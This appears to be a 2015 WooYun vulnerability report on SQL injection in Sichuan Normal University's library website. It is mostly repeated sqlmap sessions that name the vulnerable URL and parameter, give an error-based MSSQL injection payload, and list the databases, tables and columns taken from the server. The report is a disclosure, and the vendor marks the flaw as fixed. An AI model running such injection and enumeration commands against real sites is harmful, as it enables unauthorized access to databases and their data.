当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126658

漏洞标题:四川师范大学图书馆存在漏洞

相关厂商:sicnu.edu.cn

漏洞作者: 路人甲

提交时间:2015-07-14 13:45

修复时间:2015-07-14 16:29

公开时间:2015-07-14 16:29

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-14: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已经确认,细节仅向厂商公开
2015-07-14: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

RT

详细说明:

http://www.lib.sicnu.edu.cn/dyna/pfdetail.asp?node=1

root@kali:~# sqlmap -u "http://www.lib.sicnu.edu.cn/dyna/pfdetail.asp?node=1"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150708}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:34:14
[11:34:16] [INFO] testing connection to the target URL
[11:34:26] [INFO] heuristics detected web page charset 'utf-8'
[11:34:26] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
[11:34:37] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:34:38] [INFO] target URL is stable
[11:34:38] [INFO] testing if GET parameter 'node' is dynamic
[11:34:38] [WARNING] GET parameter 'node' does not appear dynamic
[11:34:38] [INFO] heuristics detected web page charset 'GB2312'
[11:34:38] [INFO] heuristic (basic) test shows that GET parameter 'node' might be injectable (possible DBMS: 'Microsoft SQL Server')
[11:34:38] [INFO] testing for SQL injection on GET parameter 'node'
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values? [Y/n]
[11:34:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:35:11] [WARNING] there is a possibility that the target (or WAF) is dropping 'suspicious' requests
[11:35:11] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[11:35:44] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[11:35:46] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'
[11:35:46] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[11:36:17] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[11:36:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error blind queries'
[11:36:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:36:22] [INFO] GET parameter 'node' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[11:36:22] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:36:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:36:22] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[11:36:23] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:36:23] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[11:36:24] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)'
[11:36:24] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)'
[11:36:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace'
[11:36:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)'
[11:36:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:36:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:36:58] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[11:36:58] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
GET parameter 'node' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 70 HTTP(s) requests:
---
Parameter: node (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: node=1' AND 9096=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9096=9096) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'GGnf'='GGnf
---
[11:37:06] [INFO] testing Microsoft SQL Server
[11:37:06] [INFO] confirming Microsoft SQL Server
[11:37:36] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[11:37:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[11:37:38] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 43 times, 404 (Not Found) - 2 times
[11:37:38] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.lib.sicnu.edu.cn'
[*] shutting down at 11:37:38
root@kali:~# sqlmap -u "http://www.lib.sicnu.edu.cn/dyna/pfdetail.asp?node=1" --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150708}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:37:44
[11:37:44] [INFO] resuming back-end DBMS 'microsoft sql server'
[11:37:44] [INFO] testing connection to the target URL
[11:37:44] [INFO] heuristics detected web page charset 'utf-8'
[11:37:44] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: node (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: node=1' AND 9096=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9096=9096) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'GGnf'='GGnf
---
[11:37:46] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[11:37:46] [INFO] fetching database names
[11:37:46] [INFO] heuristics detected web page charset 'GB2312'
[11:37:46] [INFO] the SQL query used returns 17 entries
[11:37:47] [INFO] retrieved: book
[11:37:47] [INFO] retrieved: dissertation
[11:37:47] [INFO] retrieved: Dservices
[11:37:47] [INFO] retrieved: emlib4
[11:37:48] [INFO] retrieved: gdlisxp
[11:37:48] [INFO] retrieved: GdlisXP_logs
[11:37:48] [INFO] retrieved: log
[11:37:48] [INFO] retrieved: master
[11:37:48] [INFO] retrieved: model
[11:37:49] [INFO] retrieved: msdb
[11:37:49] [INFO] retrieved: Northwind
[11:37:49] [INFO] retrieved: pubs
[11:37:49] [INFO] retrieved: pubs0
[11:37:49] [INFO] retrieved: tempdb
[11:37:50] [INFO] retrieved: TRSWCMV6
[11:37:50] [INFO] retrieved: zt21new
available databases [16]:
[*] book
[*] dissertation
[*] Dservices
[*] emlib4
[*] gdlisxp
[*] GdlisXP_logs
[*] log
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] pubs0
[*] tempdb
[*] TRSWCMV6
[*] zt21new
[11:37:50] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 17 times, 404 (Not Found) - 1 times
[11:37:50] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.lib.sicnu.edu.cn'
[*] shutting down at 11:37:50
root@kali:~# sqlmap -u "http://www.lib.sicnu.edu.cn/dyna/pfdetail.asp?node=1" --table -D "log"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150708}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:39:24
[11:39:24] [INFO] resuming back-end DBMS 'microsoft sql server'
[11:39:24] [INFO] testing connection to the target URL
[11:39:28] [INFO] heuristics detected web page charset 'utf-8'
[11:39:28] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: node (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: node=1' AND 9096=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9096=9096) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'GGnf'='GGnf
---
[11:39:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[11:39:29] [INFO] fetching tables for database: log
[11:39:29] [INFO] heuristics detected web page charset 'GB2312'
[11:39:29] [INFO] the SQL query used returns 11 entries
[11:39:30] [INFO] retrieved: dbo.click_log
Database: log
[1 table]
+-----------+
| click_log |
+-----------+
[11:39:35] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 12 times, 404 (Not Found) - 1 times
[11:39:35] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.lib.sicnu.edu.cn'
[*] shutting down at 11:39:35
root@kali:~# sqlmap -u "http://www.lib.sicnu.edu.cn/dyna/pfdetail.asp?node=1" --columns -T "click_log" -D "log"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150708}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:40:54
[11:40:54] [INFO] resuming back-end DBMS 'microsoft sql server'
[11:40:54] [INFO] testing connection to the target URL
[11:40:54] [INFO] heuristics detected web page charset 'utf-8'
[11:40:54] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: node (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: node=1' AND 9096=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9096=9096) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'GGnf'='GGnf
---
[11:40:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[11:40:57] [INFO] fetching columns for table 'click_log' in database 'log'
[11:40:58] [INFO] heuristics detected web page charset 'GB2312'
[11:40:58] [INFO] the SQL query used returns 5 entries
[11:40:58] [INFO] retrieved: ip
[11:40:59] [INFO] retrieved: nvarchar
Database: log
Table: click_log
[1 column]
+--------+----------+
| Column | Type |
+--------+----------+
| ip | nvarchar |
+--------+----------+
[11:41:03] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 11 times, 404 (Not Found) - 1 times
[11:41:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.lib.sicnu.edu.cn'
[*] shutting down at 11:41:03
root@kali:~# sqlmap -u "http://www.lib.sicnu.edu.cn/dyna/pfdetail.asp?node=1" --table -D "pubs"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150708}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:43:52
[11:43:52] [INFO] resuming back-end DBMS 'microsoft sql server'
[11:43:52] [INFO] testing connection to the target URL
[11:43:53] [INFO] heuristics detected web page charset 'utf-8'
[11:44:23] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: node (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: node=1' AND 9096=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9096=9096) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'GGnf'='GGnf
---
[11:44:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[11:44:26] [INFO] fetching tables for database: pubs
[11:44:56] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[11:44:57] [INFO] heuristics detected web page charset 'GB2312'
[11:44:57] [INFO] the SQL query used returns 14 entries
[11:44:58] [INFO] retrieved: dbo.authors
Database: pubs
[1 table]
+---------+
| authors |
+---------+
[11:45:05] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 15 times
[11:45:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.lib.sicnu.edu.cn'
[*] shutting down at 11:45:05

漏洞证明:

http://www.lib.sicnu.edu.cn/dyna/pfdetail.asp?node=1

root@kali:~# sqlmap -u "http://www.lib.sicnu.edu.cn/dyna/pfdetail.asp?node=1"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150708}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:34:14
[11:34:16] [INFO] testing connection to the target URL
[11:34:26] [INFO] heuristics detected web page charset 'utf-8'
[11:34:26] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
[11:34:37] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:34:38] [INFO] target URL is stable
[11:34:38] [INFO] testing if GET parameter 'node' is dynamic
[11:34:38] [WARNING] GET parameter 'node' does not appear dynamic
[11:34:38] [INFO] heuristics detected web page charset 'GB2312'
[11:34:38] [INFO] heuristic (basic) test shows that GET parameter 'node' might be injectable (possible DBMS: 'Microsoft SQL Server')
[11:34:38] [INFO] testing for SQL injection on GET parameter 'node'
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values? [Y/n]
[11:34:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:35:11] [WARNING] there is a possibility that the target (or WAF) is dropping 'suspicious' requests
[11:35:11] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[11:35:44] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[11:35:46] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'
[11:35:46] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[11:36:17] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[11:36:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error blind queries'
[11:36:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:36:22] [INFO] GET parameter 'node' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[11:36:22] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:36:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:36:22] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[11:36:23] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:36:23] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[11:36:24] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)'
[11:36:24] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)'
[11:36:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace'
[11:36:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)'
[11:36:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:36:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:36:58] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[11:36:58] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for few minutes and rerun without flag T in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
GET parameter 'node' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 70 HTTP(s) requests:
---
Parameter: node (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: node=1' AND 9096=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9096=9096) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'GGnf'='GGnf
---
[11:37:06] [INFO] testing Microsoft SQL Server
[11:37:06] [INFO] confirming Microsoft SQL Server
[11:37:36] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[11:37:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[11:37:38] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 43 times, 404 (Not Found) - 2 times
[11:37:38] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.lib.sicnu.edu.cn'
[*] shutting down at 11:37:38
root@kali:~# sqlmap -u "http://www.lib.sicnu.edu.cn/dyna/pfdetail.asp?node=1" --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150708}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:37:44
[11:37:44] [INFO] resuming back-end DBMS 'microsoft sql server'
[11:37:44] [INFO] testing connection to the target URL
[11:37:44] [INFO] heuristics detected web page charset 'utf-8'
[11:37:44] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: node (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: node=1' AND 9096=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9096=9096) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'GGnf'='GGnf
---
[11:37:46] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[11:37:46] [INFO] fetching database names
[11:37:46] [INFO] heuristics detected web page charset 'GB2312'
[11:37:46] [INFO] the SQL query used returns 17 entries
[11:37:47] [INFO] retrieved: book
[11:37:47] [INFO] retrieved: dissertation
[11:37:47] [INFO] retrieved: Dservices
[11:37:47] [INFO] retrieved: emlib4
[11:37:48] [INFO] retrieved: gdlisxp
[11:37:48] [INFO] retrieved: GdlisXP_logs
[11:37:48] [INFO] retrieved: log
[11:37:48] [INFO] retrieved: master
[11:37:48] [INFO] retrieved: model
[11:37:49] [INFO] retrieved: msdb
[11:37:49] [INFO] retrieved: Northwind
[11:37:49] [INFO] retrieved: pubs
[11:37:49] [INFO] retrieved: pubs0
[11:37:49] [INFO] retrieved: tempdb
[11:37:50] [INFO] retrieved: TRSWCMV6
[11:37:50] [INFO] retrieved: zt21new
available databases [16]:
[*] book
[*] dissertation
[*] Dservices
[*] emlib4
[*] gdlisxp
[*] GdlisXP_logs
[*] log
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] pubs0
[*] tempdb
[*] TRSWCMV6
[*] zt21new
[11:37:50] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 17 times, 404 (Not Found) - 1 times
[11:37:50] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.lib.sicnu.edu.cn'
[*] shutting down at 11:37:50
root@kali:~# sqlmap -u "http://www.lib.sicnu.edu.cn/dyna/pfdetail.asp?node=1" --table -D "log"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150708}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:39:24
[11:39:24] [INFO] resuming back-end DBMS 'microsoft sql server'
[11:39:24] [INFO] testing connection to the target URL
[11:39:28] [INFO] heuristics detected web page charset 'utf-8'
[11:39:28] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: node (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: node=1' AND 9096=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9096=9096) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'GGnf'='GGnf
---
[11:39:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[11:39:29] [INFO] fetching tables for database: log
[11:39:29] [INFO] heuristics detected web page charset 'GB2312'
[11:39:29] [INFO] the SQL query used returns 11 entries
[11:39:30] [INFO] retrieved: dbo.click_log
Database: log
[1 table]
+-----------+
| click_log |
+-----------+
[11:39:35] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 12 times, 404 (Not Found) - 1 times
[11:39:35] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.lib.sicnu.edu.cn'
[*] shutting down at 11:39:35
root@kali:~# sqlmap -u "http://www.lib.sicnu.edu.cn/dyna/pfdetail.asp?node=1" --columns -T "click_log" -D "log"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150708}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:40:54
[11:40:54] [INFO] resuming back-end DBMS 'microsoft sql server'
[11:40:54] [INFO] testing connection to the target URL
[11:40:54] [INFO] heuristics detected web page charset 'utf-8'
[11:40:54] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: node (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: node=1' AND 9096=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9096=9096) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'GGnf'='GGnf
---
[11:40:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[11:40:57] [INFO] fetching columns for table 'click_log' in database 'log'
[11:40:58] [INFO] heuristics detected web page charset 'GB2312'
[11:40:58] [INFO] the SQL query used returns 5 entries
[11:40:58] [INFO] retrieved: ip
[11:40:59] [INFO] retrieved: nvarchar
Database: log
Table: click_log
[1 column]
+--------+----------+
| Column | Type |
+--------+----------+
| ip | nvarchar |
+--------+----------+
[11:41:03] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 11 times, 404 (Not Found) - 1 times
[11:41:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.lib.sicnu.edu.cn'
[*] shutting down at 11:41:03
root@kali:~# sqlmap -u "http://www.lib.sicnu.edu.cn/dyna/pfdetail.asp?node=1" --table -D "pubs"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150708}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:43:52
[11:43:52] [INFO] resuming back-end DBMS 'microsoft sql server'
[11:43:52] [INFO] testing connection to the target URL
[11:43:53] [INFO] heuristics detected web page charset 'utf-8'
[11:44:23] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: node (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: node=1' AND 9096=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9096=9096) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'GGnf'='GGnf
---
[11:44:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[11:44:26] [INFO] fetching tables for database: pubs
[11:44:56] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[11:44:57] [INFO] heuristics detected web page charset 'GB2312'
[11:44:57] [INFO] the SQL query used returns 14 entries
[11:44:58] [INFO] retrieved: dbo.authors
Database: pubs
[1 table]
+---------+
| authors |
+---------+
[11:45:05] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 15 times
[11:45:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.lib.sicnu.edu.cn'
[*] shutting down at 11:45:05

修复方案:

你们更专业

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-07-14 16:29

厂商回复:

感谢支持!

最新状态:

2015-07-14:已修复